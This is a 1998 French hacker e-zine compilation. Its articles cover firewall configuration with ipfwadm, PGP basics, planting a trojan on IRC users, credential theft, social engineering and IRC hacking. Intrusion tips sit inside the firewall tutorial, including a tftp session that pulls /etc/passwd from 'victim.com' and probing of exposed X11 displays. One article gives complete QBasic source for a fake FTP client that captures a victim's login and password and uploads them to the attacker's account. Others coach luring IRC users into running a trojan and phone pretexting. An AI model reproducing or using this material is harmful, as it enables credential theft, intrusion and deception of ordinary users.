Cette documentation est  but purement ducatif , je ne pourrais pas tre 
tenu responsable de son utilisation . De plus si vous avez des remarques  
me faire , elles seront les biens venues ! J'invite tous les experts de 
scurit  me contacter . En effet j'aurais quelques questions  poser , 
quelques thories  vrifier et quelques files  demander . Sur ceux je vous 
laisse  mon aide en esprant qu'elle tanchera un peu votre soif de savoir !

--------------------
I Prsentation . . | 
--------------------

1/Objectf du firewall .
-----------------------
Les  firewalls  ont  obtenu  une grande renomme en matire de scurit sur 
Internet . 
Ils ont deux objectifs  :
 Protger le rseau interne contre les tentatives d'intrusion provenant de 
l'extrieur . 
 Limiter et vrifier les connexions provenant du rseau interne vers 
extrieur .

2/Fonctionnement du Firewall .
------------------------------
Le principe du firewall est relativement simple . 
A l'origine un firewall est un systme comportant deux interfaces rseau .
(Je vous passe l'explication bidon du mot qui en fait nous vient de 
l'automobile)

	
_________________________
|		      	|
|			      |			            ____________________
|			      |     _________________	      |reseau interne    |
|			      |     |		    |	      |que l'on souhaite |	
|	Internet	      |-----|   Firewall    |-------|proteger contre   |
|			      |     |_______________|       |les mechants      |
|			      |			            |__________________|
|_______________________|


Remarque : Il se peut que l'isolement de la totalit du rseau ne soit pas
ncessaire . A ce moment le rseau  scuris est relie au sous rseau par 
un FW et le sous rseau est reli  Internet par un routeur . Dans ce cas la 
topologie ressemblerait plus  a :
_________________             _____________             ____________________
|	          |             |reseau ou  |             |reseau interne    | 
|		    |  _________  |il ya les  |             |que l'on souhaite |
|		    |  |       |  |ordis des  |  __________ |proteger contre   |
|    Internet   |--|routeur|--|secretaires|  |        |-|les mechants      |
|		    |  |_______|  |___________|--|firewall| |__________________|
|		    |                            |________|
|_______________|

Pour la suite on prendra le premier cas , celui ou l'on souhaite protger 
tout le rseau local .
On a en fait une interface interne relie au rseau local et une interface 
externe relie  Internet . L'ordinateur firewall peut atteindre  la fois 
le rseau protg et Internet . Le rseau protge ne peut atteindre Internet 
et Internet  ne peut toucher le rseau protge .

3/Principale diffrence entre un FW et un routeur IP .
------------------------------------------------------
Le routeur prend en charge les paquets jusqu' la couche IP. 
Le routeur transmet chaque paquet en fonction de l'adresse de destination 
du paquet et de la route vers la destination prcise dans la table de 
routage . Par contre le firewall ne transmet pas les paquets . Le pare feu accepte 
les paquets et les prend en charge jusqu' la couche application . 

--------------------------
II Les diffrents types .| 
--------------------------


1/Filtres de paquet . 
---------------------
Un firewall de ce type inspecte tous les paquets qu'il recoie et regarde 
s'ils correspondent aux rgles pralablement tablis. S'il respecte les 
rgles il est accept  sinon il est rejet .  Les critres des rgles peuvent
tre par exemple l'adresse IP , les ports sources et destination contenu dans
les paquets . 

2/ Les Proxy .
-------------- 
Lorsqu'un firewall de type proxy est utilis sur un rseau , il n'y a aucune 
connexion directe entre les systmes du rseau local et le rseau Internet . 
Les machines internes se connectent en fait au firewall pour lui demander un 
service . Aprs le FW se charge de relayer la requte au serveur Internet 
puis de renvoyer la rponse au client interne 

3/Les hybrides .
----------------
La je peux pas dire grand chose dessus . 

-----------------------
III Filtre de paquet .|
-----------------------

La technologie de filtre de paquets est incluse dans le noyau de Linux . 
Le filtre doit agir dans la pile IP du systme . Pour utiliser cette 
technique vous allez devoir une fois de plus recompiler le noyau (Youpi vous 
allez bien vous marrez ) et rpondre YES aux questions suivantes :

IP : forwarding/gatewaying (CONFIG_IP_FORWARD)			YES
IP : firewalling (CONFIG_IP_FIREWALL)				YES
IP : firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)	YES

Le noyau compil , install , redmarr vous allez tre en mesure de 
configur le FW.
Pour cela on va utilis ipfadm . 
La syntaxe gnrale est :

ipfwadm -A commande paramtres [options]
ipfwadm -I commande paramtres [options]
ipfwadm -O commande paramtres [options]
ipfwadm -F commande paramtres [options]
ipfwadm -M [-l ou -s] [options]

Comme vous venez de le voir il y a cinq catgories : 
  -A configuration de l'accounting (compatibit des paquets atteignant le 
systme) .
  -I rgles  appliquer aux paquets TCP/IP en entre .
  -O rgles  appliquer aux paquets TCP/IP en sortie . 
  -F rgles  appliquer aux paquets TCP/IP  router d'une interface  une 
autre . 
  -M administration de l'IP Masquerading .

Perso je pourrais vous parler que des categories I , O , F , M.
ipfwadm possde de trs nombreuses options que je vais pas dcrire ici par 
ce j'ai pas envie ! Lisez la doc Linux .

Avant de crer toute rgles de filtre IP , vas falloir dfinir des rgles de 
scurit . 
Par exemple pour ma machine on va dire :
n Toute connexion du rseau internet vers une machine interne est interdite .
n De extrieur , on doit avoir accs au serveur de messagerie et au service 
DNS du firewall .

On va dire qu'on a un rseau interne de type 193.1.1.0/24 et qu'on est 
reli  un sous rseau de type 193.1.2.0/24  (entre le FW et le routeur) . 
Le FW ayant pour adresse 193.1.1.254 en interne (eth0) et 193.1.2.1 en 
externe (eth1) .

Je vais maintenant dire quelques uns des filtres que j'applique

-ipfwadm -O -p accept 
La rgle par dfaut des paquets en sortie est accept (-p reprsente l'action 
par dfaut)
- ipfwadm -I -p deny
La rgle par dfaut des paquets en entre est deny .
-ipfwadm -F -p deny 
La rgle par dfaut des paquets  router en entre est deny .
-ipfwadm -F -a  accept -S 193.1.1.0/24 -D0/0 -P tcp 
Autorisation pour router tous les paquets TCP provenant de l'extrieur . 
-ipfwadm -I -a deny -S 193.1.1.0/24 -D0/0 -W eth1
Cette commande sert  lutter contre le SPOOFING (changer son adresse IP) en 
effet cette rgle dit que tous les paquets qui rentrent dans le sous rseau 
scuris et qui ont une adresse source correspondant  une adresse du sous 
rseau (ce qui n'est pas logique) doivent tre rejet !
-ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 53 
-ipfawadm -I -a accept -P tcp -S0/0 -D 193.2.1.1 53 
Ces mesures disent que les accs au serveur DNS (port 53)  sont accessible 
de n'importe o .
-ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 25
Accs au serveur SMTP du firewall de n'importe o . 

Malheureusement on retrouve l le plus grand inconvenient des FW . En effet 
dans l'tat actuelle systme on ne pourra pas faire fonctionner un client 
FTP du rseau interne avec un serveur situ  l 'extrieur . 
Le protocole FTP prvoit l'tablissement d'une connexion du serveur FTP vers 
le client (du port 20 -> port > 1024)

Mais il y a des solutions .
- Utiliser le client FTP en mode passif  (A ce moment le client tablit une 
connexion vers le serveur ftp)
- Utiliser un proxy(voir section suivante) install sur le FW qui relaiera 
les requtes de l'intrieur vers extrieur .
- Utiliser l'IP masquerading .
- Ou alors rajouter cette rgle 
	ipfwadm -F -a accept -P tcp -S0/0 20 -D 193.1.1.0/24 1024-65535

Remarque intressante : Si vous tombez sur un systme avec une rgle de ce 
type , vous pouvez en profitez , en effet cette rgle expose les services du 
rseau interne qui coutent sur un port >1024 . A partir de la vous avez 
plus qu'a fait partir un paquet du port 20 de votre machine vers un service .
Beaucoup de services tournent sur ce port  .
Par exemple pour sur les ports 6000vous avez les services X-Windows . S'ils 
n'ont pas ete protege correctement vous pouvez matter ce que fait le mec !  
Vous pouvez memes voir les toubhes frappees , les programmes lancees . 
Si vous faites telnet dessus vous aurez je pense l'effet d'un denial of 
service ; l'ecran va se geler , le sys va ralentir ... Mais il y a plus 
rigolo ! 
SI vous vous y connaissez un peu en programmation utilisez la fonction 
XOpenDisplay() , si la fonction retourne NULL alors c'est securise sinon ...

    char   *hostname;

    if (XOpenDisplay(hostname) == NULL) {
       printf("Loupe : %s\n", hostname);
    } else {
       printf("Ca marche : %s\n", hostname);
    }



Il y a a autre chose auquel il faut penser . Normalement la route qu'emprunte
un paquet de se source a sa destination est determinee par les routeurs qui 
se trouvent entre eux . En fonction de l'adresse de destination et de leur 
table les routeurs se chargent de dirigier les paquets . Mais dans une trame 
TCP/IP , il y a une option  qui porte le nom de " source routing " qui est 
peu utilisee . En fait on l'utilise dans le debuggage des reseaux pour 
trouver les problmes . Le truc c'est que si vous envoyez un paquet en 
faisant croire qu'il vient de l'interieur , normalement les routeurs ne 
devrait pas l'ammener au FW mais le probleme la c'est  qu'ils le font avec 
cette option . En plus c'est pas hyper du a faire ! Mais normalement il y a 
des options pour desactiver le "source routing " .

Note : n'oubliez pas de configurer les clients de telle faon que le routeur 
par dfaut soit le FW .

---------------------
IV IP MASQUERADING .|
---------------------

C'est une technique de plus en plus utilise . Elle consiste  masquer 
totalement l'adressage IP du rseau interne ( On peut donc utiliser des 
adresses IP prives ) . Ainsi chaque paquet qui traverse le firewall est 
modifi pour faire croire qu'il n'y a qu'un seul systme connect . Tout le 
rseau interne partage ainsi l'adresse IP (externe)  du  FW .

Installation :
Bon beh va falloir recompiler le noyau (c'est la fte !) et rpondre YES aux 
questions :

IP : forwarding/gatewaying (CONFIG_IP_FORWARD)		
IP : firewalling (CONFIG_IP_FIREWALL)				
IP : firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)	
IP : masquerading (CONFIG_IP_MASQUERADE)
IP : ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP)

(Rpondez oui que si le FW doit router les paquets ICMP)

Maintenant vous allez tre en mesure d'utiliser une autre des 5 options 
d'ipfwadm : l'option -M .
Pour cela utiliser l'option -l qui liste les connexions qui utilisent l'IP 
masquerading et -s qui fixe le timeout .

Pour autoriser le masquerading il faudra les rgles suivantes
- ipfwadm -F -p deny
- ipfwadm -F -a masquerade -S 192.10.10.0/24 -D0/0

V PROXY .

D'aprs ce que j'ai lu et ce qu'on m'a dit la meilleure solution pour 
utiliser une machine Linux en proxy consiste  utiliser l'ensemble d'outils 
qu'offre TIS .
Ils fournissent un package connu sous le nom de FW toolkit . Vous pouvez le 
telecharger sur le site Web de TIS 
http ://www.tis.com/docs/products/fwtk/index.html

Installation 
Bon comme vous allez tre un Proxy , il va falloir forcement dsactiver la 
fonction de routeur de Linux . Pour cela on recompile le noyau en rpondant 
NO au forwarding/gatewaying (CONFIG_IP_FORWARDING) . Vous tes pas oblig de 
mettre cette option mais si vous ne le faites pas les machines du rseau 
interne seraient directement accessibles de l'extrieur  travers les 
possibilits du FW .
Si l'IP forwarding est laisse , alors la il y a une faille mais la je 
connais pas du tout ,en fait la solution  serait de downer le firewall , 
ainsi le FW ne marcherait plus mais le noyau lui continuerait a router les 
paquets sans suivre les rgles ! Pour a , il  y a des solutions diverses et 
pas trs gentilles comme le SYN flooding et autres attaques barbares . 

Bon vous compilez les outils TIS en suivant les instructions .

Configuration 
La table netperm rside dans le fichier /usr/local/etc/netprem-table . 
Cette table dcrit la configuration principale de tous les composants du 
Trusted Firewall Toolkit . Quand une des applications est lance elle va 
chercher sa config dans cette table

Description :

-Netacl : Cette application permet de donner l'accs aux diffrents services 
TCP . Ce programme se dmarre depuis le super-dmon inetd . 
Si par exemple on ajoute au fichier /etc/inetd.conf 
telnet stream tcp nowait root /usr/local/etc/netacl telnetd 
Avec ca quand une requte atteint le port ftp du systme netacl se dmarre 
avec comme paramtre telnetd . Mais avant que le dmon soit lance le logiciel
vrifie que la requte est valide selon la table . Par exemple si je veux 
autorise aux personnes de mon rseau interne de se connecter au telnet du FW 
faudra ajouter :
netacl-telnetd : permit-hosts 193.1.1.* -exec /usr/sbin/in.telnetd
(note 193.1.1.* quivaut  193.1.1.0/24)

Aprs on a aussi tous les logiciels qui implementent un relais pour les 
services . 
En fait le client fait d'abord une requte au service du FW puis de la fait 
une requte pour se connecter au site extrieur . Selon les rgles du proxy 
cette connexion sera refuse ou accepte .
-tn-gw : relais pour le service telnet .
-ftp-gw : relais pour le service ftp . 
-rlogin-gw : relais pour le proxy rlogin .
-http-gw : relais pour client HTTP et gopher .( pratique pour empcher 
certaines applications JAVA ) 
....
Il y en a d'autres mais je les connais pas tous donc pour plus de 
renseignement allez voir vous mme !

exemple de config de /usr/local/etc/netperm-table :
tn-gw : deny-hosts * -dest 193.1.1.* 
Interdiction a ces machines d'accder au service telnet . 
tn-gw : permit-hosts 193.1.1.25 
autorise la machine 193.1.1.25 a accder au service telnet .

Pas compliqu et je vous jure que c'est incroyable tout ce que l'on peut 
faire et les espces de trou dans la scurit que ca peut faire !

----------------------------------------------
VI Assainissement et protection du Firewall .|
----------------------------------------------

Bon vous avez compris , quand on veut attaquer un systme qui possde un FW 
il y a pas 36 choix il faut attaquer le FW . Alors reste plus qu' trouver 
les points faibles et donc il faut vrifier la protection de cette machine . 
On va maintenant voir comment on assainie un Firewall . 

Premirement, regardez le fichier /etc/inet.conf. Ce  fichier est ce qu'on 
appelle un "super-serveur". Il lance un tas de dmons serveurs  sur demande .
  Il contient la liste des services offerts . Il faut enlever tous les 
services qui ne sont pas parfaitement obligatoire comme NIS, NFS, rsh, rcp,
netstat,systat,tftp,bootp et finger... 

NOTE qui peut faire gagner du temps : Il n'est pas ncessaire de tout 
dsactiver. Pour dsactiver un service, placez simplement un # devant. 
Ensuite envoyez un signal SIG-HUP au processus inetd, selon la syntaxe 
suivante : kill  -HUP <pid>, ou pid est le numro du  processus inetd.
(Pour avoir le PID si vraiment vous tes dbutant sous Linux , faites ps 
-uax |grep inetd ) . Cela force inetd a relire son fichier de configuration 
(inetd.conf) et a se relancer .

Petite astuce : 
Si TFTP est ouvert tent le coup , ce protocole permet de transfrer des 
fichiers comme ftp mais s'appuie sur le protocole UDP. Il est donc moins 
sur et ne peut servir que pour les fichiers de petite taille . Mais surtout 
il ne demande pas de MOT DE PASSE ET DE COMPTE UTILISATEUR ! Donc tout 
utilisateur qui a accs au port 69a accs  tous les fichiers lisibles par 
le dmon correspondant . 
Il y a peut tre de bonnes infos  prendre . 
 tentez ca :
evil % tftp
 tftp> connect victim.com
 tftp> get /etc/passwd /tmp/passwd.victim
 tftp> quit

Pour la scurit Il faut aussi bien videmment supprimer tous les comptes 
utilisateurs inutiles . 

Il faut aussi supprimer tous les package installs qui n'ont rien  faire sur un firewall comme X window , les  services NFS et Samba , les jeux (OK c'est  discutable pour le dernier ) .....

Exemple type de machine ou on installe un firewall :
Je vais prendre mon PC , un 166MMX , 32 Mo de Ram et une partition de 800 
Meg pour Linux  avec une connexion PPP a un fournisseur Internet (a je l'ai 
pas encore L ) par un modem 36,6 kbps. Pour  en  faire  un  firewall , On 
ajoute un carte ethernet compatible NE2000. Il est alors connecte a trois 
autres PC . Et voil un firewall typique . 

Pour protger le firewall (en effet c'est lui qui va se prendre dans la 
gueule toutes les attaques) il faut utiliser un filtre de paquet . 
Pour faire ca on recompile le noyau avec ces options :

IP : forwarding/gatewaying (CONFIG_IP_FORWARD)			NO 
IP : firewalling (CONFIG_IP_FIREWALL)				YES
IP : firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)	YES

On s'inspira des rgles sur le filtrage des paquets expos dans le III 
notamment celle contre le spoofing ! 

tromh@yahoo.com
www.altern.org/trom
Greetings : C-A, R3Z0 , Kortex agency , i-e , tous les gars sur #hack.fr 
(undernet)

				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/


PGPNP6=|G `.$p~͹:D;qѨII,]RGQ$;p
aLۗjie3j0v|-------------------------|K<ܻ$Pr$
$
cIF-o<n:İ׵̣,|           PGP           |q4EbbH-fcWnO<n:
<hEޱť}BuEi| stealthyx #h/p/c/l 1998 |R8)+k ú:Pū
(H>,ܐп$ۘJ~ f|-------------------------|CmdTIf!ay5$
.Qw!cIF-o<n:İ SdTIf!ay58 ͹:];



------------------
I-What is PgP ???|
------------------

Retournez a l'ecole revoir votre vocabulaire ... :))

----------------------------
II-Pourkoi utiliser PgP ???|
----------------------------

Ben ca parait evident, meme si en france c interdit....

Vous voyez vot mail ???
Ben c very simple de le hacker. Y'a qu'a spoofer le service passwd pour 
avoir votre passwd. 
Dites vous deja que vous vous etes deja fais hacker vot mail. Y'avait rien 
de CONFIDENTIEL dans vot mail ?????

---------------------------
III-Comment ca marche ??? | 
---------------------------

1-Les systemes  cle privee :
-----------------------------
Ces systemes utilisent une clee unique pour crypter et decrypter
Pour les amateurs en math comme moi ;) : 
Soit une cl k et un texte clair P, on obtient le texte chiffr C
par l'application de l'algorithme f : 
C = f k (P) 
et l'opration inverse pour le dchiffrement :
P = f' k (C) 
Si f = f', alors le systme est dit symtrique.  

2-Securite :
------------ 
Ce systeme est securise seulement si la cle ne circule po partout. Faut donc
que vous vous debrouillez pour ne po faire circuler votre cle n'importe 
comment... (evitez le mail, donc)

3-Les systemes  cle publique : 
-------------------------------
Dans ce systeme, il n'y a pas une mais deux cles.
L'une sert au chiffrement et l'autre au dchiffrement.
La premiere est publique (prise d'un bouquin, d'un annuaire...), la seconde
et secrete.

Math : 
Principe : soit le texte clair P, une cl prive pr, une cl
publique pu et l'algorithme f, nous avons :
C = f pu (P)
P = f pr (C) 

La relation fonctionne dans un sens : il est simple  partir de
la cl prive de gnrer la cl publique mais l'inverse est
considr comme trs difficile ou "avec les moyens actuels,
impraticable''. 

4-Principe des signatures :
---------------------------
Generation d'un Message Digest qui identifie, par un nombre de taille fixe,
le texte lui-mme, 
Chiffrement de cette valeur par RSA avec la cl prive de l'expditeur, 
permettant aux correspondants de vrifier la validit avec la cl publique 
de l'expditeur.

Math : 
Soit M un message de taille arbitraire et H une fonction,
h est le rsultat de l'application de H sur M :
h = H(M), avec h de longueur m 
H est une fonction "trappe'', utilise dans un seul but :
fournir un identificateur unique pour un message.



Voila vous savez tout. Si vous etes pas bon en math, laissez tomber l'
encription...   ;)))

									steal
				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/


			          Le hack des newbies
;);););););););););););););););););););););););););););););););););););););)
;););) |Hacker sous irc ou comment montrer que win95 c de la merde!!!| ;););
;);););););););););););););););););););););););););););););););););););););)


YES!!!

Cette article est pour rassurer les frustres du hack ki ne se sont po encore,
tapez de becane... Mais j'insiste sur le fait que penetrer une becane est 
illegale et que ce txt et la qu'a but informatif seulement...

Bon je v d'abord rappeller brievement ce qu'est un cheval de troie avant de
commencer : 
un cheval de troie ou taupe et un programme qui lorsqu'il est loge sur une
machine peut vous donner l'acce  cette meme machine.

Bon, y'a un programme qui s'appelle hackerparadise...
Ce prog est constitue de 2 parties : explor.exe et paradise.exe...
L'un doit etre sur la machine de la victime, l'autre sur la vot.
Sur l'irc inventez un gros ballourd pour inciter les autres  prendre explor.
exe (j'espere que vous aurez pris la precaution de changer son name)... 

<X>DCC le moi stp!!!
<Y>ouep, bien sur
<X>merci!!
<Y>hehehehe
<X>pourkoi tu rigole ?????
<Y>parceque j'aime qu'on me leche le cul !!!

dite a votre victime de le lancer online.

<X>ben, ca marche po ton prog, y'a po de fenetre... :((((
<Y>ah, bon????? Doit y'avoir un probleme sur ta becane...
<X>Ba, non alor, elle est toute neuve !!!

J'espere que vous aurez compris que explor.exe est une taupe...
Lancez paradise.exe, allez sur connect, tapez l'ip du mec, et connectez vous.
La vous avez tout les droits... Pourkoi vous avez tout les droits ??? 
Parceque sur une becane win, y'a pas de pyramide de privilege, et que toutes
personne qui connecte sur une becane windaube a tout les droits...

<X> Cendrine c ki ???
<Y>????
<X> ta petite ami ???
<Y>comment tu sais ca ???
<X> OUUUUU, tu as red alert ???
<Y>?????? T'as hacker ma machine ?????
<X>hehehehehe
<Y>stp supprime rien, stp!!!
<X>hehehehehe
<Y>Pourkoi tu rigole c po drole!!! Supprime rien stp... :(((
<X>j'aime qu'on me leche le cul....
									
										steal

		      	    /----------\
	         	     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/




	  ---[ hacker facilement les Comptes ftp, telnet, mail :]---

CODE MAG
By CODE-BAR

N 1 Hacker Facilement des Comptes FTP,Telnet, Mail :

Cette technique demande trs peu de connaissances. Elle s'adresse 
plutt aux Newbies (dbutants). Pour qu'elle marche, elle demande 
que l'utilisateur en face ne soit pas trop prudent.
Voici comment nous allons procder :
Nous voulons obtenir le Login et le Password d'un compte FTP. 
Pour cela, nous allons bricoler un logiciel FTP bidon. 
J'entends par logiciel FTP bidon : un logiciel ayant l'apparence 
d'un client FTP (comme WS-FTP) mais qui n'en est pas un. Il nous 
faudra galement un compte FTP nous appartenant. (Chez Mygale sa 
devrais faire l'affaire). Donc, notre logiciel FTP bidon demandera 
(comme tout logiciel client FTP)  l'utilisateur le nom du serveur 
sur lequel est son compte, son Login et son Password. Ensuite, il 
enregistrera ces infos dans un fichier. Une fois les infos
enregistres, 
le programme devra les envoyer directement dans notre compte. 
Et voila ! A prsent, Il nous suffit d'aller relever dans notre compte 
les fichiers qui contiennent les accs  l'aide cette fois d'un vrai
client FTP. 
L'exemple suivant est utilis pour un compte FTP mais vous pouvez 
adapter cette technique pour tout autre type de comptes en modifiant 
simplement l'aspect extrieur du programme. 
Voici le code source du programme en Q-Basic. 
Vous pouvez bien videment adapter ce code dans un autre langage. 
Vous trouverez les fichiers sources en VB4 dans ce E-Mag. A vous
d'amliorer le dezine... 

------
rem [Gnrateur Alatoire] 
Randomize Timer 
rem [Infos sur le compte FTP] 
cls 
input "Veuillez rentrer l'adresse de votre serveur FTP "; A$ 
input "Veuillez rentrer votre Login "; N$ 
input "Veuillez rentrer votre Password "; P$ 
rem [Cration d'un nom alatoire de fichier pour le tlchargement sur
votre compte] 
For X = 1 To 5 
F$ = F$ + Chr$(65 + Int(Rnd * 26)) 
Next 
rem [Cration d'un nom alatoire de fichier pour les commandes FTP] 
For X = 1 To 5 
G$ = G$ + Chr$(65 + Int(Rnd * 26)) 
Next 
rem [Cration d'un nom alatoire pour le fichier Batch (*.bat) qui
executera les commandes] 
For X = 1 To 5 
B$ = B$ + Chr$(65 + Int(Rnd * 26)) 
Next 
rem [Enregistrement des infos du compte dans un fichier] 
Open "C:\" + F$ For Output As #1 
Print #1, A$ 
Print #1, N$ 
Print #1, P$ 
Close #1 
cls 
print "Connect to " + A$ 
rem [Enregistrement des commandes FTP] 
Open "C:\" + G$ For Output As #1 
Print #1, "open www.exemple.com" 
Print #1, "quote user code-bar" 
Print #1, "quote pass h5fila45" 
Print #1, "put C:\" + F$ + " x" + F$ 
Print #1, "close" 
Close #1 
rem [Enregistrement des commandes dans le fichier batch] 
Open "C:\windows\" + B$ + ".bat" For Output As #1 
Print #1, "@echo off" 
Print #1, "C:\windows\ftp -v -n -s:C:\" + G$ 
Print #1, "cls" 
Print #1, "del C:\" + F$ 
Print #1, "del C:\" + G$ 
Print #1, "cls" 
Close #1 
rem [Dmarrage du fichier de commandes (Batch)] 
Shell "C:\windows\" + B$ + ".bat" 
Shell "del C:\windows\" + B$ + ".bat" 
rem [Fin de la procdure et erreur simule] 
cls 
Print "Error (520) FTP Connexion failed" 
boucle: 
goto boucle 
------ 

Maintenant que votre petite saloperie est prte, vous l'envoyez par
E-Mail 
(maquill en message de promotion)  la personne que vous voulez
choper. 
Vous attendez que votre gars tombe dans votre petit pige. Et Voila ! 
Il vous suffit de vous connecter sur votre compte et d'aller rechercher 
les fichiers qui commencent par un p'tit "x" !









		      	    /----------\
	         	     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/


                       LE Social Eingineering



Je devais faire un article sur le SE dans ce mag depuis plusieurs mois dj.
Mais entre temps, le mag du groupe frhack est sorti est il y avait un article
sur le SE  l'interieur. En comptant aussi l'article de NoWay, ca allait 
faire trois article parlant de la mme chose.
Alors plutt que de faire un article reprenant tout depuis le dbut, j'ai
prfer faire un complment  l'article de NoWay et de frhack.
Vous ne trouverez ici que des conseils, et pas trop de dfinition.

Bonne lecture.


Niveau exig pour faire du SE : dbutant
Limite du SE : -Ne se pratique que dans des pays ayant la mme langue que 
vous (sauf si vous parlez plusieurs langues parfaitement)

Bon, je passe donc rapidement sur la dfinition, vu que maintenant tout le 
monde la connait (quoi que c'est mme p sur...)
Le Social Eingineering est l'art de se faire passer pour quelqu'un que
l'on est pas dans le but de soutirer des informations confidentielles.

En fait le SE est plus dur que l'on pourrait le penser. Il faut tre assez 
fort pour ne pas que la personne que l'on encule ait des doutes, mais aussi
repartir avec suffisement d'information interessante pour que ce que vous 
avez fait vaille le coup (c'est comme ca l'orthographe de 'vaille' ??)

-----------------------------------------------------------------------------
IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP

1) Un trs bon entrainement au SE est de faire des canulars telephoniques.
Plus vous en faites et plus vous arrivez  faire avaler des choses normes 
vos victimes, et plus vous pourrez vous dire que vos sances de SE seront une
russite...

IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP
-----------------------------------------------------------------------------


Il faut aussi faire attention  se positionner selon la personne que l'on a 
 l'autre bout du fil (ayez une personalite diffrente en fonction que vous
avez en face de vous une secretaire ou un 'expert scurit' ;) ).

Pour faire une bonne attaque au SE, il faut avoir un minimum d'information sur 
la  socit ou l'organisme que l'on veut penetrer.

Brain Override donne pour conseil de se faire passer pour un journal ou une 
radio afin d'obtenir cas informations.
Une autre mthode bien cool est le trashing: faire les poubelles. Vous 
n'aurez pas forcment vos informations du premier coup, mais vous risquez 
aussi de repartir  la fin avec beaucoup plus d'informations que vous n'en 
auriez eut en vous faisant passer pour un journal...

Apres les prparatif, on peut passer  l'attaque...

-----------------------------------------------------------------------------
IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP

2) Reglez votre voix ! J'explique: au telephone, les gens peuvent reconnaitre
assez facilement une personne entre 15-30 ans et une personne au dessus de 40
ans, grce au timbre de la voix.
Si vous vous faites passez pour une personne de 40 ans, alors que vous avez 
15 ans, mme si votre voix a mue depuis longtemps, votre interlocuteur 
risque de s'en rendre compte...
Pour parer cela, inventez-vous un perso qui a environ votre ge (si vous avez 
entre 15 et 20 ans, une voix d'un mec jusqu'a 30 ans passe encore), ou alors
essayez de trafiquer votre voix. Ce n'est pas vraiment une bonne solution, 
parce que si vous avez un probleme au tel et que votre voix passe brusquement
de celle d'un mec de 40  celle d'un gamain de 15, vous serez grill  fond ! 
  
3) Il ne faut pas hsiter  ce servir de fille quand cela est possible.
On se mfie beaucoup moins d'une fille que d'un mec.
Alors prenez une copine, faites lui un texte appropri ou vous la faite 
passer pour votre secretaire, standardiste (...), faites lui rpeter son 
texte et lancez-la ! Si a un moment le mec lui pose une question  laquelle 
elle ne peut pas rpondre, faites lui dire: "Attendez 5 secondes, monsieur, 
je vous passe mon suprieur...", prenez le combin au bout de quelques 
secondes pour faire comme si vous arriviez de votre bureau, et rpondez  la 
question (attention, lisez le tips 2 et reportez le ici ! !).
EFFETS GARANTIS ! ! ! (sauf si la question tait: "Quel est le nom de votre
organisme/socit" et que votre pouf de copine n'a pas pu improviser pour ca)

IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP
-----------------------------------------------------------------------------


Bien entendu, votre social eingineering ne marchera pas si votre texte est de
la merde. Et comme je suis gentil, je vais vous donnez quelques aides... ;)

En fait, vous devez avoir des feuille avec TOUT les renseignements qui 
pourraient vous servir lors de votre attaque.
Personelement, je ne prpare pas UNE feuille mais TROIS.
Sur la premiere je mets tout les renseignements concernant ce que je veux 
penetrer: Nom du responsable informatique, nom du boss... Vous devez mettre
le maximum d'information, ca peut toujours vous aider.
Sur la deuxieme, je mets ma propre fausse identit, mon age, mon nom, ma 
socit, en fait, tout ce que la personne que je vais avoir au bout du fil 
est susceptible de me demander.
Enfin, sur la troisieme, je mets mon scnario, quelques rponses bateau, et
les renseignements que je dois avoir obtenu  la fin.
L'avantage d'avoir trois feuille au lieu d'une, est que les renseignements 
sont bien mieux classs, ainsi, si l'on vous pose une question, vous perdrez
moins de temps  chercher la rponse, donc il y aura moins de risque que la
personne au bout du fil ait un doute.

Bon, maintenant quelques conseils avant de faire une attaque:
	-rptez plusieurs fois votre rle jusqu' ce que vous l'ayez 
parfaitement assimil et que vous n'ayez plus  vous servir de vos feuilles.
Ces dernieres ne vous seront utiles quant cas d'oubli pendant le SE.
	-Gardez toujours votre voix naturelle au tlephone. Sauf si vous tes
trs fort, une voix trafique se remarque tout de suite, et vous allez vous
faire mechement jeter!!!

Voil, si vous avez lu l'article de NoWay et celui de Brain Ocerride dans 
frhack, vous pouvez vous lancer, vous avez toutes les informations necessaire
pour le russir.

Si vous avez encore des trucs, n'hsitez pas  m'ecrire. Pour les suggestions
pareil. Pour des questions, vous pouvez essayer mais ce n'est pas sr qu'il
y aura une rponse... ;)
Enfin, je recherche le maximum d'information sur le protocol TCP/IP pour ma
culture personelle.

Mon E-Mail: tripbomb@hotmail.com


				   Bye. Tripbomb.


				    

				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/



Hacking IRC (Internet Relay Chat)
Par SoD 
-----------------------------------------------------------------------------------------------------

(J'ai utilise pour cela Win95 et mIRC)
Ok on y va:  
Pour faire partie de l'IRC vous avez besoin de deux choses.  Un 
client IRC  (ex: mIRC) et une connection Internet .  Qu'est ce qu'un client 
IRC ?  Un client IRC est un programme qui vous permet de vous connecter a un 
serveur IRC   (allez sur: www.mircx.com).  Si vous utilisez deja  IRC cela 
ne sert a rien de lire la prochaine section.  :)

Les bases de l'IRC:  
